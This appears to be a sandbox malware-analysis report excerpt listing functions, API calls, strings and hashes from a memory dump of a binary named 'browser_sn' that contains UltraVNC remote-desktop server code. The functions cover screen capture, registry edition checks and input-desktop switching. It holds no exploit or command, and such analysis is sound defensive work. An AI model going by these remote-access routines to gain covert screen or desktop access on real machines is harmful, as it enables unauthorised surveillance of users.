Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
API String ID: 421869683-3362258117
Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction ID: 54b201ee3819efe3603267e7049cf86deeacee7e331c9df60c30fe6a075927d7
Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction Fuzzy Hash: 27518432A28B4185E764EF31E8442A9B7B4FF85750F845235EA9D43BA8DF3CE515C710

Function 00007FF790C33C70 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetClipBox.GDI32 ref: 00007FF790C33CC9
IsRectEmpty.USER32 ref: 00007FF790C33CDC
CreateCompatibleDC.GDI32 ref: 00007FF790C33CF5
CreateSolidBrush.GDI32 ref: 00007FF790C33D11
SelectObject.GDI32 ref: 00007FF790C33D31
PatBlt.GDI32 ref: 00007FF790C33D7F
SelectObject.GDI32 ref: 00007FF790C33D8F
StretchBlt.GDI32 ref: 00007FF790C33DD8
SelectObject.GDI32 ref: 00007FF790C33DE4
SelectObject.GDI32 ref: 00007FF790C33DF0
DeleteObject.GDI32 ref: 00007FF790C33E09
DeleteDC.GDI32 ref: 00007FF790C33E1A

Part of subcall function 00007FF790C33A90: GetModuleFileNameA.KERNEL32 ref: 00007FF790C33AB6

Strings

, xrefs: 00007FF790C33DA3
!, xrefs: 00007FF790C33D72

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
String ID: $!
API String ID: 844750580-2056089098
Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
Instruction ID: 61a1c67abaf146b1807d265b67cdbcf4fc2654bb7fc7bb4863d38741aa38a8ab
Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
Instruction Fuzzy Hash: 1C414D3562978286EA70AB31A8143AAF3A0FF89B94F845134DD5E47B94DF3CF4449B14

Function 00007FF790C36E00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00007FF790C36300), ref: 00007FF790C36E32
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF790C36300), ref: 00007FF790C36E6B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF790C36300), ref: 00007FF790C36F9E

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF790C36300), ref: 00007FF790C36EB7
lstrlenA.KERNEL32 ref: 00007FF790C36F64
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF790C36300), ref: 00007FF790C36F87

Strings

@, xrefs: 00007FF790C36F51
Enterprise, xrefs: 00007FF790C36F22
System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF790C36E0F
SBS, xrefs: 00007FF790C36EFC
Terminal Server, xrefs: 00007FF790C36EE0
Personal, xrefs: 00007FF790C36F3E
Small Business, xrefs: 00007FF790C36F0F
ProductSuite, xrefs: 00007FF790C36E54, 00007FF790C36EA3

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Openlstrlenmalloc
String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
API String ID: 1137168859-3840687832
Opcode ID: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
Instruction ID: 748a31b4678e7fc1aa3d1cd6c974b56942ebe36cdfcef6a46a676ff715dee58e
Opcode Fuzzy Hash: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
Instruction Fuzzy Hash: 1A415D31A2C74381EA64AB31B4402B9F7A0EF8ABC4F845131E98D42B69DF2CF555CB20

Function 00007FF790C609F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

SetRect.USER32 ref: 00007FF790C60A2D
SetTextColor.GDI32 ref: 00007FF790C60A3F
SetBkColor.GDI32 ref: 00007FF790C60A54
CreateSolidBrush.GDI32 ref: 00007FF790C60A62
SelectObject.GDI32 ref: 00007FF790C60A79
FillRect.USER32 ref: 00007FF790C60A9A
DrawTextA.USER32 ref: 00007FF790C60AC1
SetBkColor.GDI32 ref: 00007FF790C60AD1
SetTextColor.GDI32 ref: 00007FF790C60AE1
SelectObject.GDI32 ref: 00007FF790C60AF1
DeleteObject.GDI32 ref: 00007FF790C60AFA
GdiFlush.GDI32 ref: 00007FF790C60B22

Part of subcall function 00007FF790C61540: GetDIBits.GDI32 ref: 00007FF790C615C1

Strings

x, xrefs: 00007FF790C60A25
UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF790C60AAC

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
API String ID: 3190128964-2508378015
Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
Instruction ID: 4f3dd2db097c2ee9e91c139bdd1de0ade1f89655668bc2c86736e2b611b853b5
Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
Instruction Fuzzy Hash: 22313235618A8696E710AF75E4445AAF3B0FF89B98F845032DE4E47718DF7CE445CB20

Function 00007FF790C49C30 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF790C49DF1
CombineRgn.GDI32 ref: 00007FF790C49E0D
DeleteObject.GDI32 ref: 00007FF790C49E16
free.LIBCMT ref: 00007FF790C49E1F

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

CreateRectRgn.GDI32 ref: 00007FF790C49F4A
CombineRgn.GDI32 ref: 00007FF790C49F63
DeleteObject.GDI32 ref: 00007FF790C49F6C
free.LIBCMT ref: 00007FF790C49F75
CreateRectRgn.GDI32 ref: 00007FF790C4A08A
CombineRgn.GDI32 ref: 00007FF790C4A0A6
DeleteObject.GDI32 ref: 00007FF790C4A0AF
free.LIBCMT ref: 00007FF790C4A0B8

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

Strings

vistahook.cpp : REct %i %i %i %i , xrefs: 00007FF790C49D1B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
String ID: vistahook.cpp : REct %i %i %i %i
API String ID: 1305454473-3781348997
Opcode ID: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
Instruction ID: ed23f897ccb745535c7d854dcb834f6e7cffa18963885dbfe7f62758fe2c5d7b
Opcode Fuzzy Hash: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
Instruction Fuzzy Hash: CCE13676B246918AE720DF79D4846ACB7F1FB49B88F804036DE4E93B58DB38E454CB50

Function 00007FF790C66D40 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 226threadtimeCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF790C66DCF
CreateThread.KERNEL32 ref: 00007FF790C66F11
timeGetTime.WINMM ref: 00007FF790C66F38
CreateRectRgn.GDI32 ref: 00007FF790C67052
CombineRgn.GDI32 ref: 00007FF790C6706B
DeleteObject.GDI32 ref: 00007FF790C67074
free.LIBCMT ref: 00007FF790C6707D
GetForegroundWindow.USER32 ref: 00007FF790C670B1
GetCursorPos.USER32 ref: 00007FF790C670FD
WindowFromPoint.USER32 ref: 00007FF790C6710C
GetDesktopWindow.USER32 ref: 00007FF790C6711F

Part of subcall function 00007FF790CE7DE8: _errno.LIBCMT ref: 00007FF790CE7E00
Part of subcall function 00007FF790CE7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7E0C

Strings

schook, xrefs: 00007FF790C66D94
w8hook, xrefs: 00007FF790C66EC2

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
String ID: schook$w8hook
API String ID: 2828954817-2864610768
Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
Instruction ID: 5f4d4b23be1e479879ee5e462cd83677a1928b10c8278df63a948bc4e18b4dbf
Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
Instruction Fuzzy Hash: 90B10936A18B8686EA74AB31E4441EAB7A0FF45B84F844536DB9E43751DF38F485C321

Function 00007FF790C45EF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 171windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF790C45F47

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

Part of subcall function 00007FF790C470B0: EnumDisplaySettingsA.USER32 ref: 00007FF790C470F4
Part of subcall function 00007FF790C470B0: LoadLibraryA.KERNEL32 ref: 00007FF790C47109
Part of subcall function 00007FF790C470B0: GetProcAddress.KERNEL32 ref: 00007FF790C4712D
Part of subcall function 00007FF790C470B0: FreeLibrary.KERNEL32 ref: 00007FF790C471F2

malloc.LIBCMT ref: 00007FF790C45F53
GetDC.USER32 ref: 00007FF790C45FBD
GetSystemPaletteEntries.GDI32 ref: 00007FF790C45FE7
GetLastError.KERNEL32 ref: 00007FF790C45FF0
DeleteDC.GDI32 ref: 00007FF790C46021
ReleaseDC.USER32 ref: 00007FF790C4602E

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF790C45F61
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF790C45FAF
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF790C46160
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF790C45FC8
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF790C45F1B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF790C45FF6

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
Instruction ID: 5c1917d371802b1ca96187a30508f2fe67d6fd4cbd1e44aa804150716a2d30f2
Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
Instruction Fuzzy Hash: 8B610462A2968241E734EB35A4113F9B7A1FF56744FC45036EA8E4B395EE3CF14AC360

Function 00007FF790C45550 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 162windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF790C455A5

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

Part of subcall function 00007FF790C470B0: EnumDisplaySettingsA.USER32 ref: 00007FF790C470F4
Part of subcall function 00007FF790C470B0: LoadLibraryA.KERNEL32 ref: 00007FF790C47109
Part of subcall function 00007FF790C470B0: GetProcAddress.KERNEL32 ref: 00007FF790C4712D
Part of subcall function 00007FF790C470B0: FreeLibrary.KERNEL32 ref: 00007FF790C471F2

malloc.LIBCMT ref: 00007FF790C455AF
GetDC.USER32 ref: 00007FF790C45611
GetSystemPaletteEntries.GDI32 ref: 00007FF790C4563B
GetLastError.KERNEL32 ref: 00007FF790C45644
DeleteDC.GDI32 ref: 00007FF790C45675
ReleaseDC.USER32 ref: 00007FF790C45682

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF790C455BD
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF790C45603
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF790C4577E
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF790C4561C
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF790C4557A
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF790C4564A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction ID: d23492d11392e94cfc9c9ca560a92975a11fbbd1a30fdc29b56872a660a4e2e0
Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction Fuzzy Hash: 155109A2B3958241E729EB35A4502F8B3A1FF46744FC45039E94E87791DE3CF549C760

Function 00007FF790C44970 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 77threadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C449A5
GetCurrentThreadId.KERNEL32 ref: 00007FF790C449CF
GetThreadDesktop.USER32 ref: 00007FF790C449D7
GetUserObjectInformationA.USER32 ref: 00007FF790C44A06
SetThreadDesktop.USER32 ref: 00007FF790C44A4C
DialogBoxParamA.USER32 ref: 00007FF790C44A86
SetThreadDesktop.USER32 ref: 00007FF790C44A8F
CloseDesktop.USER32 ref: 00007FF790C44A9D

Strings

TextChat.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF790C44A56
TextChat.cpp : OpenInputdesktop Error , xrefs: 00007FF790C449B7
TextChat.cpp : !GetUserObjectInformation , xrefs: 00007FF790C44A10
TextChat.cpp : OpenInputdesktop OK, xrefs: 00007FF790C449C3
TextChat.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF790C44A2A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 1907048692-1814171851
Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
Instruction ID: 7cf0db2a57a3c73ccca3026ce77b57a76112e3d104054a337913befeadbaee40
Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
Instruction Fuzzy Hash: 3F311762A28A8291EB34EB31B8542EAB3A1FF89754FC45031D98E47754DF3CF14687A0

